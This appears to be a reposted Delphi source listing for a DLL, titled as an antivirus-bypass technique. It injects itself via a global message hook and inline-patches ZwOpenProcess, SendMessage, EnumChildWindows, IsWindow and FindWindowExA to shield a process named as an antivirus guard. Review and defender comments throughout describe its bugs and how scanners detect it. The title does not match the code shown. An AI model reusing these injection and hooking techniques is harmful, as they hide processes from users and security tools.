delphi 替换系统文件实现绕过杀软启动


本文整理自网络,侵删。


library ProtectUser;
// DLL that (a) registers a WH_GETMESSAGE hook so it gets mapped into other
// GUI processes (InstallHook) and (b) on every DLL_PROCESS_ATTACH overwrites the
// prologues of ntdll!ZwOpenProcess and five user32 exports with jumps into the
// callbacks of unit ApiCallBack (MyDLLHandler). The callbacks filter calls
// whose target resolves to MyProcessId, the PID of the window located by
// FindWindow in MyDLLHandler.
// Defender note: a global SetWindowsHookEx hook (dwThreadId = 0) and 8-byte
// inline patches on ntdll/user32 exports are both observable artefacts; hook
// scanners that compare in-memory export prologues with the on-disk image and
// monitoring of WriteProcessMemory onto executable pages will surface this.
uses
SysUtils,
windows,
Messages,
ApiCallBack,
MyApi,
Hook_Pas in 'Hook_Pas.pas';
var
// Handle returned by SetWindowsHookEx in InstallHook; 0 while no hook is set.
DLLHook: HHOOK;
// WH_GETMESSAGE hook procedure. It only forwards to the next hook in the
// chain; its purpose is to give SetWindowsHookEx a reason to map this DLL into
// every process that pumps messages on the desktop (see InstallHook).
// NOTE(review): a hook procedure is expected to return the LRESULT of
// CallNextHookEx, but this is declared as a procedure, so the result is
// discarded and the system receives an unspecified return value.
procedure HookProc(nCode, wParam, lParam: LongWORD);stdcall;
begin
CallNextHookEx(DLLHook, nCode, wParam, lParam);
end;

{ Install the message hook.
  Registers HookProc as a WH_GETMESSAGE hook for all threads on the current
  desktop (last argument 0) using this module's HInstance, and returns True
  when SetWindowsHookEx handed back a non-zero handle.
  Defender note: a desktop-wide WH_GETMESSAGE hook forces the hooking DLL to be
  loaded into every message-pumping process; this is a classic DLL-injection
  vector and the call is worth auditing on the host. }
function InstallHook(): Boolean; stdcall;
begin
DLLHook := SetWindowsHookEx(WH_GETMESSAGE, @HookProc, Hinstance, 0);
Result := DLLHook <> 0;
end;

{ Remove the hooks.
  Writes the saved original prologue bytes back over each of the six patched
  exports (UnLoadApiHook) and then unregisters the WH_GETMESSAGE hook.
  NOTE(review): the Boolean results of UnLoadApiHook and the result of
  UnHookWindowsHookEx are ignored, so a failed restore is silently dropped and
  the export may be left patched. DLLHook is also not reset to 0 afterwards. }
procedure UnHook; stdcall;
begin
UnLoadApiHook(ApiHook_ZwOpenProcess);
UnLoadApiHook(ApiHook_SendMessageA);
UnLoadApiHook(ApiHook_SendMessageW);
UnLoadApiHook(ApiHook_EnumChildWindows);
UnLoadApiHook(ApiHook_IsWindow);
UnLoadApiHook(ApiHook_FindWindowExA);
UnHookWindowsHookEx(DLLHook);
end;

// DLL entry handler (assigned to DLLProc in the library main block).
// On DLL_PROCESS_ATTACH: looks up the window with class 'ThunderRT6FormDC'
// (a VB6 runtime form class) and title 'Simple System AntiVirus (Guard)',
// stores that window's process id in MyProcessId, and then patches the
// prologues of ZwOpenProcess, SendMessageA/W, EnumChildWindows, IsWindow and
// FindWindowExA so that they jump into the callbacks of unit ApiCallBack. Each
// callback suppresses calls aimed at MyProcessId and passes the rest through.
// On DLL_PROCESS_DETACH: restores the exports and removes the message hook.
// NOTE(review): FindWindow's result is not checked. If the window is absent,
// hWndExe is 0, GetWindowThreadProcessId fails, MyProcessId keeps its initial
// value (Delphi globals are zero-initialised) and the six patches are still
// applied to whatever process loaded this DLL.
// NOTE(review): the Boolean results of the LoadApiHook calls are ignored; a
// partially patched set of exports is not reported.
procedure MyDLLHandler(Reason: Integer);
begin
if Reason = DLL_PROCESS_ATTACH then begin
hWndExe:=FindWindow('ThunderRT6FormDC','Simple System AntiVirus (Guard)');
GetWindowThreadProcessId(hWndExe,MyProcessId);
// Each LoadApiHook resolves the export with GetProcAddress, saves its first
// 8 bytes and overwrites them with a MOV EAX,imm32 / JMP EAX stub (Hook_Pas).
LoadApiHook('NTDLL.DLL','ZwOpenProcess',@ZwOpenProcessCallBack,ApiHook_ZwOpenProcess);
LoadApiHook('USER32.DLL','SendMessageA',@SendMessageACallBack,ApiHook_SendMessageA);
LoadApiHook('USER32.DLL','SendMessageW',@SendMessageWCallBack,ApiHook_SendMessageW);
LoadApiHook('USER32.DLL','EnumChildWindows',@EnumChildWindowsCallBack,ApiHook_EnumChildWindows);
LoadApiHook('USER32.DLL','IsWindow',@IsWindowCallBack,ApiHook_IsWindow);
LoadApiHook('USER32.DLL','FindWindowExA',@FindWindowExACallBack,ApiHook_FindWindowExA);
end;
if Reason = DLL_PROCESS_DETACH then begin
   UnHook;
end;
end;

exports
InstallHook,UnHook;
// Library main block: this runs on the initial DLL_PROCESS_ATTACH. Delphi
// delivers later attach/detach notifications through DLLProc, which is why the
// handler is registered here and then invoked once directly for the initial
// attach. Consequence: every process this DLL is mapped into receives the six
// API patches at load time, whether or not InstallHook is ever called.
begin
DLLProc := @MyDLLHandler;
MyDLLhandler(DLL_PROCESS_ATTACH);
end.


unit ApiCallBack;
interface
uses
SysUtils,
windows,
Messages,
MyApi,
Hook_Pas;
var
   // Window handle and process id of the target located by FindWindow in
   // ProtectUser.MyDLLHandler; every callback below compares against
   // MyProcessId to decide whether to forward or suppress a call.
   hWndExe:HWND;
   MyProcessId:Cardinal;
   // Saved original bytes, patch bytes and address for each hooked export
   // (record layout in Hook_Pas). Passed to HookStatus to toggle the patch.
   ApiHook_ZwOpenProcess:TApiHook;
   ApiHook_SendMessageA:TApiHook;
   ApiHook_SendMessageW:TApiHook;
   ApiHook_EnumChildWindows:TApiHook;
   ApiHook_IsWindow:TApiHook;
   ApiHook_FindWindowExA:TApiHook;
// Replacement bodies for the patched exports. Each has the same stdcall
// signature as the export it replaces, because control arrives via a JMP
// written over the export's prologue rather than via a normal call.
function ZwOpenProcessCallBack(
      var ProcessHandle :Cardinal;
      const AccessMark:Cardinal;
      var OA : Object_AttriButes;
      var CI : Client_ID):LongInt;stdcall;
function SendMessageACallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
function SendMessageWCallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
function EnumChildWindowsCallBack(hWndParent: HWND; lpEnumFunc: TFNWndEnumProc; lParam: LPARAM): BOOL; stdcall;
function IsWindowCallBack(hWnd: HWND): BOOL; stdcall;
function FindWindowExACallBack(Parent, Child: HWND; ClassName, WindowName: PChar): HWND; stdcall;
implementation
// Hook body for ntdll!ZwOpenProcess.
// If CLIENT_ID.UniqueProcess is not MyProcessId: remove the patch
// (HookStatus(False)), call the real export, re-apply the patch, and return
// its NTSTATUS. If it is MyProcessId: set the output handle to $FFFFFFFF and
// never reach the export.
// NOTE(review): Result (the NTSTATUS) is not assigned in the else branch, so
// the caller gets an indeterminate status next to the -1 handle. Also note
// that $FFFFFFFF is the value of the current-process pseudo-handle, so a
// caller that uses the handle anyway operates on itself.
// NOTE(review): the unpatch / call / repatch sequence is not synchronised.
// Another thread calling ZwOpenProcess in that window reaches the original
// export unfiltered, and concurrent callers can leave the prologue in the
// wrong state.
function ZwOpenProcessCallBack(
      var ProcessHandle :Cardinal;
      const AccessMark:Cardinal;
      var OA : Object_AttriButes;
      var CI : Client_ID):LongInt;stdcall;
begin
if CI.UniqueProcess<>MyProcessId then begin
      HookStatus(False,ApiHook_ZwOpenProcess);
        Result:= ZwOpenProcess(
      ProcessHandle,
      AccessMark,
      OA,
      CI);
        HookStatus(True,ApiHook_ZwOpenProcess);
    end
    else begin
      ProcessHandle:=Cardinal(-1);
    end;
end;

// Hook body for user32!SendMessageA.
// Resolves the owning process of hWnd; for any process other than MyProcessId
// the patch is lifted, the real SendMessageA is called and the patch is
// re-applied. Messages to windows owned by MyProcessId are dropped.
// NOTE(review): Result is not assigned on the suppressed path, so the caller
// receives an indeterminate LRESULT.
// NOTE(review): the return value of GetWindowThreadProcessId is not checked;
// for an invalid hWnd (or a special value such as HWND_BROADCAST) the local
// ProcessId is compared while uninitialised.
function SendMessageACallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
        HookStatus(False,ApiHook_SendMessageA);
        Result:=SendMessageA(hWnd, Msg, wParam, lParam);
        HookStatus(True,ApiHook_SendMessageA);
end;
end;

// Hook body for user32!SendMessageW.
// Unlike the ANSI variant, messages to windows owned by MyProcessId are still
// forwarded, except WM_GETTEXT, which is swallowed. Everything else goes
// through the lift-patch / call / re-patch sequence.
// NOTE(review): Result is not assigned on the WM_GETTEXT path, so the caller
// receives an indeterminate LRESULT instead of a zero text length.
// NOTE(review): the lift/call/re-patch sequence is not synchronised across
// threads; see the same remark on ZwOpenProcessCallBack.
function SendMessageWCallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
        HookStatus(False,ApiHook_SendMessageW);
        Result:=SendMessageW(hWnd, Msg, wParam, lParam);
        HookStatus(True,ApiHook_SendMessageW);
      end
else begin
      // Target window belongs to MyProcessId: only WM_GETTEXT is blocked.
      if Msg<>WM_GETTEXT then begin
        HookStatus(False,ApiHook_SendMessageW);
            Result:=SendMessageW(hWnd, Msg, wParam, lParam);
            HookStatus(True,ApiHook_SendMessageW);
      end;
end;
end;

// Hook body for user32!EnumChildWindows.
// Enumeration is forwarded to the real export unless hWndParent is owned by
// MyProcessId, in which case nothing is enumerated and lpEnumFunc is never
// called.
// NOTE(review): Result (BOOL) is not assigned on the suppressed path, so the
// caller cannot tell a blocked enumeration from a successful empty one.
// NOTE(review): hWndParent = 0 (enumerate top-level windows) makes
// GetWindowThreadProcessId fail and leaves ProcessId uninitialised.
function EnumChildWindowsCallBack(hWndParent: HWND; lpEnumFunc: TFNWndEnumProc;
lParam: LPARAM): BOOL; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWndParent,ProcessId);
if ProcessId<>MyProcessId then begin
        HookStatus(False,ApiHook_EnumChildWindows);
        Result:=EnumChildWindows(hWndParent, lpEnumFunc, lParam);
        HookStatus(True,ApiHook_EnumChildWindows);
end;
end;

// Hook body for user32!IsWindow.
// Forwards to the real export for windows not owned by MyProcessId; for
// windows of MyProcessId the call is suppressed.
// NOTE(review): Result is not assigned on the suppressed path, so callers see
// an indeterminate BOOL rather than a deliberate False.
function IsWindowCallBack(hWnd: HWND): BOOL; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
        HookStatus(False,ApiHook_IsWindow);
        Result:=IsWindow(hWnd);
        HookStatus(True,ApiHook_IsWindow);
end;
end;

// Hook body for user32!FindWindowExA.
// The filter is applied to the Child argument, i.e. the window after which
// the search starts, not to the window the search would return. The real
// export is called only when that handle is not owned by MyProcessId.
// NOTE(review): Child is commonly 0 (start from the first child); then
// GetWindowThreadProcessId fails and ProcessId is compared uninitialised.
// NOTE(review): Result is not assigned on the suppressed path.
function FindWindowExACallBack(Parent, Child: HWND; ClassName, WindowName: PChar): HWND; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(Child,ProcessId);
if ProcessId<>MyProcessId then begin
        HookStatus(False,ApiHook_FindWindowExA);
        Result:=FindWindowExA(Parent, Child, ClassName, WindowName);
        HookStatus(True,ApiHook_FindWindowExA);
end;
end;

end.

unit Hook_Pas;

interface
        type
        // Per-export inline-hook state.
        //   OldProc - the original first 8 bytes of the export, saved by
        //             LoadApiHook and written back by UnLoadApiHook/HookStatus.
        //   NewProc - the 8-byte stub written over the export:
        //             B8 imm32 (MOV EAX,callback) FF E0 (JMP EAX) 00.
        //   OldAddr - address of the export as returned by GetProcAddress.
        //   NewAddr - declared but never assigned or read in this unit.
        TApiHook = record
          OldProc:array[0..7] of byte;
          NewProc:array[0..7] of byte;
          OldAddr,NewAddr:Pointer;
        end;

        // Resolve DllName!ApiName in the current process, save its first 8
        // bytes and overwrite them with a jump to FuncCallBack.
        Function LoadApiHook(DllName:PAnsiChar;ApiName:PAnsiChar;FuncCallBack:Pointer;Var ApiHook :TApiHook):Boolean;stdcall;
        // Write the saved original bytes back over the export.
        Function UnLoadApiHook(var ApiHook:TApiHook):Boolean;stdcall;
        // Re-apply (True) or lift (False) the patch; the callbacks use this to
        // reach the original export.
        Function HookStatus(blnIsHook:Boolean;var ApiHook:TApiHook):Boolean;stdcall;
implementation
uses
Windows,Dialogs;

// Install an inline prologue patch on DllName!ApiName in the current process.
// Steps: LoadLibrary/GetProcAddress to get the export address, build the
// 8-byte stub in NewProc from the 4-byte callback address, save the original
// 8 bytes with ReadProcessMemory and overwrite them with WriteProcessMemory.
// Cardinal(-1) is the current-process pseudo-handle, so this only ever
// patches the calling process.
// NOTE(review): the stub embeds a 32-bit absolute address (MOV EAX,imm32),
// so this is x86-only; it is not a valid patch in a 64-bit process.
// NOTE(review): the function result is only assigned on the success path;
// on any failure (export not found, read or write failed) it is left
// indeterminate. hMod is declared but unused, and the LoadLibrary reference
// is never released.
// Defender note: the write lands on executable pages of ntdll/user32; the
// modified prologue differs from the on-disk image and is what integrity and
// hook-scanning checks look for.
Function LoadApiHook(DllName:PAnsiChar;ApiName:PAnsiChar;FuncCallBack:Pointer;Var ApiHook :TApiHook):Boolean;stdcall;
var
        hMod:Cardinal;
        Tmp:array[0..3] of byte;
        nSize:Cardinal;
begin
        ApiHook.OldAddr:=GetProcAddress(LoadLibrary(DllName),ApiName);
        // Copy the little-endian callback address into Tmp for the imm32.
        Move(DWORD(FuncCallBack),Tmp,4);
        with ApiHook do begin
                Newproc[0]:=$B8;          //MOV EAX,imm32 (imm32 = FuncCallBack)
                NewProc[1] := Tmp[0];
                NewProc[2] := Tmp[1];
                NewProc[3] := Tmp[2];
                NewProc[4] := Tmp[3];
                NewProc[5]:=$FF;
                NewProc[6]:=$E0;        //JMP EAX
                // Stub is 7 bytes; the 8th byte is zeroed so that a full 8
                // bytes are written and later restored from OldProc.
                NewProc[7]:=0;
                if ReadProcessMemory(Cardinal(-1),OldAddr,@OldProc,8,nSize) then
                  if WriteProcessMemory(Cardinal(-1),OldAddr,@NewProc,8,nSize) then begin
                        LoadApiHook:=True;
                  end;
        end;

end;

// Restore the original prologue: writes the 8 saved bytes in OldProc back to
// OldAddr in the current process (pseudo-handle -1).
// NOTE(review): the result is only assigned when the write succeeds; on
// failure it is left indeterminate rather than set to False. The `with`
// block is redundant since the fields are fully qualified anyway.
Function UnLoadApiHook(var ApiHook:TApiHook):Boolean;stdcall;
var
nSize:Cardinal;
begin
with ApiHook do begin
    if WriteProcessMemory(Cardinal(-1),ApiHook.OldAddr,@ApiHook.OldProc,8,nSize) then begin
      UnLoadApiHook:=True;
    end;
end;

end;

// Toggle the patch on an export: blnIsHook = True writes the stub (NewProc)
// over OldAddr, False writes the saved original bytes (OldProc) back. The
// callbacks in ApiCallBack call this with False, invoke the real export, and
// call it again with True.
// NOTE(review): the result is assigned only when WriteProcessMemory succeeds;
// otherwise it is indeterminate. There is no locking, so a second thread
// that enters a hooked export between the two writes sees the unpatched
// prologue, and two threads toggling concurrently can leave it in either
// state.
Function HookStatus(blnIsHook:Boolean;var ApiHook:TApiHook):Boolean;stdcall;
var
nSize: Cardinal;
begin
with ApiHook do begin
    if blnIsHook = True then
      begin
        // Re-apply the stub.
        if WriteProcessMemory(Cardinal(-1), ApiHook.OldAddr, @NewProc, 8, nSize) then begin
          HookStatus:=True;
        end;
      end
    else
      begin
        // Lift the stub so the original export can be called.
        if WriteProcessMemory(Cardinal(-1), ApiHook.OldAddr, @OldProc, 8, nSize) then begin
          HookStatus:=True;
        end;
      end;
end;
end;

end.


unit MyApi;

interface
type
    // Pascal mirror of the native OBJECT_ATTRIBUTES structure. Every field is
    // declared as a 4-byte Cardinal or Pointer, so the layout only matches
    // the native structure in a 32-bit process (the native RootDirectory,
    // SecurityDescriptor and SecurityQualityOfService fields are
    // pointer/handle-sized).
    OBJECT_ATTRIBUTES=record
        Length :Cardinal;
        RootDirectory :Cardinal;
        ObjectName :Pointer;
        Attributes :Cardinal;
        SecurityDescriptor :Cardinal;
        SecurityQualityOfService :Cardinal;
    end;
    // Pascal mirror of CLIENT_ID; UniqueProcess is the PID that
    // ZwOpenProcessCallBack compares against MyProcessId. Same 32-bit-only
    // caveat as above (native fields are HANDLE-sized).
    CLIENT_ID=record
        UniqueProcess :Cardinal;
        UniqueThread :Cardinal;
    end;
    // Direct imports of the NT system-call stubs from ntdll. AccessMark is
    // presumably the ACCESS_MASK (DesiredAccess) argument. Only ZwOpenProcess
    // is referenced by the other units shown; NtOpenProcess is declared but
    // unused here.
    Function NtOpenProcess(
      var ProcessHandle :Cardinal;
      const AccessMark:Cardinal;
      var OA : Object_Attributes;
      var CI : Client_ID) :LongInt;stdcall;external 'NTDLL.DLL';
    Function ZwOpenProcess(
      var ProcessHandle :Cardinal;
      const AccessMark:Cardinal;
      var OA : Object_Attributes;
      var CI : Client_ID) :LongInt;stdcall;external 'NTDLL.DLL';
implementation

end.
